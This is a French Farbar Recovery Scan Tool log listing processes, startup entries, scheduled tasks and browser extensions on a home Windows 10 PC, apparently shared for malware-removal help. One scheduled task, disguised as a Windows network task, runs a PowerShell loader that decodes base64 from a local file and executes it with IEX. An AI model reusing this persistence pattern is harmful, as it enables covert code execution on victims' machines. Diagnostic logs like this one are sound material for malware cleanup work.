Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 14-07-2021
Exécuté par eddy99 (administrateur) sur FAMILLE (MEDION MS-7797) (18-07-2021 14:17:23)
Exécuté depuis C:\Users\eddy99\OneDrive\Bureau
Profils chargés: eddy99
Platform: Windows 10 Home Version 21H1 19043.1110 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
(Acresso Software Inc. -> Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\eddy99\AppData\Roaming\uTorrent\updates\3.5.5_45952\utorrentie.exe <2>
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\eddy99\AppData\Roaming\uTorrent\uTorrent.exe
(Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\BrYNSvc.exe
(CyberLink -> CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSServer.exe
(Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé] C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.92\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.92\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <39>
(Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Intel® Trusted Connect Service -> Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Ivaylo Beltchev -> IvoSoft) [Fichier non signé] C:\Program Files\Classic Shell\ClassicStartMenu.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\eddy99\AppData\Local\Microsoft\OneDrive\21.129.0627.0002\FileCoAuth.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\eddy99\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2106.14307.0_x64__8wekyb3d8bbwe\Cortana.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(NortonLifeLock Inc. -> Broadcom) C:\Program Files\Norton Security\Engine\22.21.5.44\NortonSecurity.exe <2>
(NortonLifeLock Inc. -> NortonLifeLock Inc.) C:\Program Files\Norton Security\Engine\22.21.5.44\nsWscSvc.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TP-Link Technologies Co., Ltd) [Fichier non signé] C:\Program Files (x86)\TP-Link\TP-Link Wireless Adapter WPS Tool\TWCU.exe
==================== Registre (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13192848 2012-08-20] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [163640 2017-08-13] (Ivaylo Beltchev -> IvoSoft) [Fichier non signé]
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [285240 2012-11-19] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
HKLM-x32\...\Run: [CLMLServer_For_P2G8] => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [111120 2012-06-08] (CyberLink -> CyberLink)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491120 2012-07-20] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [93296 2012-07-13] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [146584 2017-11-07] (Brother Industries, Ltd. -> Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.) [Fichier non signé]
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc. -> Apple Inc.)
HKLM\...\Policies\Explorer: [ConfirmFileDelete] 1
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [Epic Privacy Browser Installer] => C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe [509096 2020-12-16] (Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé]
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [utweb] => "C:\Users\eddy99\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [uTorrent] => C:\Users\eddy99\AppData\Roaming\uTorrent\uTorrent.exe [1950504 2021-04-05] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Software Inc. -> Acresso Corporation)
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [Advanced Recent Access] => C:\Program Files (x86)\TSS\Advanced Recent Access\Advanced Recent Access.exe
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [] => [X]
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [34508416 2021-06-17] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [WPSTool] => C:\Program Files (x86)\TP-Link\TP-Link Wireless Adapter WPS Tool\TWCU.exe [1891840 2018-01-30] (TP-Link Technologies Co., Ltd) [Fichier non signé]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\91.0.4472.124\Installer\chrmstp.exe [2021-07-01] (Google LLC -> Google LLC)
==================== Tâches planifiées (Avec liste blanche) ============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {0334D116-C39C-4D22-8D52-82C361A5EFD8} - System32\Tasks\NCH Software\PixillionSevenDays => C:\Program Files (x86)\NCH Software\Pixillion\Pixillion.exe [2012704 2021-06-07] (NCH Software, Inc. -> NCH Software)
Task: {0DDB73BB-E9A8-48C7-85F5-43E1321ED4B3} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969}
Task: {16841D09-F088-42B6-9D9A-03B7DC89C2F7} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [233824 2012-06-14] (Intel® Services Manager -> Intel Corporation)
Task: {1C67B312-95A2-42DC-A324-DB28138CD485} - System32\Tasks\Microsoft\Windows\NetService\Network\WindowsNetwork => C:\Windows\System32\SyncAppvPublishingServer.vbs -> "n;[string]$content=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::ReadAllText('C:\Users\eddy99\AppData\Roaming\logs.txt').Replace('-','')));IEX $content;"
Task: {1D3D7BE4-DA67-41A4-B832-0B101AA30289} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-15] (Google LLC -> Google LLC)
Task: {2265DFCB-D646-40D7-B474-C84CCCC9BF3F} - System32\Tasks\Opera scheduled assistant Autoupdate 1608146455 => C:\Users\eddy99\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\eddy99\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {29E9B4B3-FB15-4956-9C93-7AD389707F46} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security Online\Upgrade.exe [2345120 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {2D8D6270-EBA9-4E16-8C67-DEAACBED18DA} - System32\Tasks\Norton Security with Backup\Norton Security Online Error Analyzer => C:\Program Files\Norton Security\Engine\22.21.5.44\SymErr.exe [115696 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {3141AAC7-DE44-4B29-9D2D-F58CA6F46ABD} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1}
Task: {34B89F26-D9E5-431E-8EBA-8B6AB9388F65} - System32\Tasks\Opera scheduled Autoupdate 1608146440 => C:\Users\eddy99\AppData\Local\Programs\Opera\launcher.exe
Task: {52451D21-23D7-4680-8E16-96CA703C5EB7} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [662464 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {60077B5E-11BE-44F4-B2CC-31934BC12B8E} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [522688 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {69033476-7E07-42CC-A1AD-D4466A055F05} - System32\Tasks\Norton Security with Backup\Norton Security Online Autofix => C:\Program Files\Norton Security\Engine\22.21.5.44\SymErr.exe [115696 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {6984D361-1E83-420C-B009-777DF9F2A0D3} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe [469952 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files (x86)\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {7C0C03ED-4D20-4255-B657-BB8A2195D44E} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E}
Task: {7E16430A-31C7-41E5-8444-36E7AD40526B} - System32\Tasks\Norton Security with Backup\Norton Security Online Error Processor => C:\Program Files\Norton Security\Engine\22.21.5.44\SymErr.exe [115696 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {919C494D-482C-4490-97F9-6427AEE41F63} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-15] (Google LLC -> Google LLC)
Task: {94CD9053-54E4-4574-ADC3-46C128E1EEF8} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61}
Task: {970DDEE7-0B0A-4B7A-854B-46BBD547E564} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [233824 2012-06-14] (Intel® Services Manager -> Intel Corporation)
Task: {A539B4BA-3E66-471E-AA08-13E5830EAA66} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-26] (Adobe Inc. -> Adobe Inc.)
Task: {AF69FF99-32AE-4571-A0D6-C128C94A464B} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2069952 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B4112717-F5BA-4732-9914-F03F2C2C19A4} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [757184 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B577B748-6FBE-46FA-8F16-6BB532A1D9C4} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [28880512 2021-06-17] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {B5A343F7-377F-4ACD-A8D2-B4D500535626} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371}
Task: {B86B6C80-E4B3-465C-84A6-F5BC7A5D761D} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.21.5.44\WSCStub.exe [643584 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {C6D3FCE9-3749-4200-8C85-C3372F1F5B34} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [976832 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {CFF75ADA-E3FD-4F6F-BBB9-38E179FEA761} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-06-17] (Piriform Software Ltd -> Piriform)
Task: {E6E11880-C652-48B3-AE7E-39E041C129FA} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [569416 2016-02-23] (Apple Inc. -> Apple Inc.)
Task: {F17728DD-1E1C-474D-B3F2-FE4D4BABEF48} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {F50F9C5A-8AB7-403A-AEC2-E4D19BF05AAA} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {FCA2F478-93A0-4E56-BBBD-2BA63080887F} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [510912 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FFE87D94-D809-4550-9E9B-3C1429B75683} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [662464 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
Winsock: Catalog5 08 C:\WINDOWS\SysWOW64\wlidNSP.dll [41984 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Winsock: Catalog5 09 C:\WINDOWS\SysWOW64\wlidNSP.dll [41984 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Winsock: Catalog5-x64 08 C:\WINDOWS\system32\wlidnsp.dll [67072 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Winsock: Catalog5-x64 09 C:\WINDOWS\system32\wlidnsp.dll [67072 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{46C6D42B-3CC7-4754-BEAE-8C2BF9EA2951}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{a6f7fd9a-859c-4bb6-97e6-ecfb8161fbe0}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{BBFC9A64-64E0-432B-89B7-5F2847FE927A}: [DhcpNameServer] 192.168.1.1
Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default [2021-07-18]
Edge HomePage: Default -> qwant.com
Edge StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/","hxxp://www.google.com/"
Edge DefaultSearchURL: Default -> {bing:baseURL}search?q={searchTerms}&{bing:cvid}{google:assistedQueryStats}
Edge Extension: (GIPHY for Gmail) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\andgibkjiikabclfdkecpmdkfanpdapf [2021-07-02]
Edge Extension: (Norton Safe Web) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bdaafgjhhjkdplpffldcncdignokfkbo [2021-07-07]
Edge Extension: (Outlook) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-12-17]
Edge Extension: (Office) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gggmmkjegpiggikcnhidnjjhmicpibll [2021-04-23]
Edge Extension: (Word) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-12-17]
Edge Extension: (Qwant) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hnlkiofnhhoahaiimdicppgemmmomijo [2020-12-20]
Edge Extension: (Guns Wallpapers HD New Tab by freeaddon.com) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\iaijjmobdokjfemcipmdpkkedeoficgg [2020-12-20]
Edge Extension: (Norton Password Manager) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\lcccdlklhahfmobgpnilndimkankpnkg [2021-07-02]
Edge Extension: (Excel) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-12-17]
Edge Extension: (Microsoft News New Tab) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\lklfbkdigihjaaeamncibechhgalldgl [2021-02-19]
Edge Extension: (Infinite New Tab - the best Chrome startpage) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\meffljleomgifbbcffejnmhjagncfpbd [2020-12-20]
Edge Extension: (Norton Safe) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\mpnlkmlkncncpgnnkmkgoobfpnjmblnk [2021-06-20]
Edge Extension: (PowerPoint) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-12-17]
FireFox:
========
FF DefaultProfile: ih85zco8.default
FF ProfilePath: C:\Users\eddy99\AppData\Roaming\Mozilla\Firefox\Profiles\ih85zco8.default [2021-01-01]
FF ProfilePath: C:\Users\eddy99\AppData\Roaming\Mozilla\Firefox\Profiles\1sds48oy.default-release-1626460500160 [2021-07-18]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.12 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.15 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.16 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.cpdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Pas de fichier]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-11-16] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-11-16] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-03-24] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-03-24] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-06-27] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3835626661-1005971116-1630247016-1002: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=3 -> C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2020-12-16] (Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé]
FF Plugin HKU\S-1-5-21-3835626661-1005971116-1630247016-1002: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=9 -> C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2020-12-16] (Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé]
Chrome:
=======
CHR Profile: C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default [2021-07-18]
CHR Notifications: Default -> hxxps://forums.futura-sciences.com; hxxps://www.futura-sciences.com
CHR HomePage: Default -> qwant.com
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/","hxxp://www.google.com/"
CHR DefaultSearchURL: Default -> hxxps://www.qwant.com/?q={searchTerms}&client=ext-chrome-sb
CHR DefaultSearchKeyword: Default -> www.qwant.com
CHR DefaultSuggestURL: Default -> hxxps://api.qwant.com/api/suggest/?q={searchTerms}&client=opensearch&lang=fr_fr
CHR Extension: (Slides) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-06-01]
CHR Extension: (Safe Torrent Scanner) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2021-07-18]
CHR Extension: (GIPHY for Gmail) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\andgibkjiikabclfdkecpmdkfanpdapf [2021-07-01]
CHR Extension: (Docs) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-06-01]
CHR Extension: (Google Drive) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-06-01]
CHR Extension: (YouTube) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-06-01]
CHR Extension: (Black green shards) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\cojkleigdijnbfecdhjigpgalhfhkdee [2021-05-13]
CHR Extension: (Sheets) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-06-01]
CHR Extension: (Norton Safe Web) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnpbeacklnhmkkilekogeiekaglbmmka [2021-06-26]
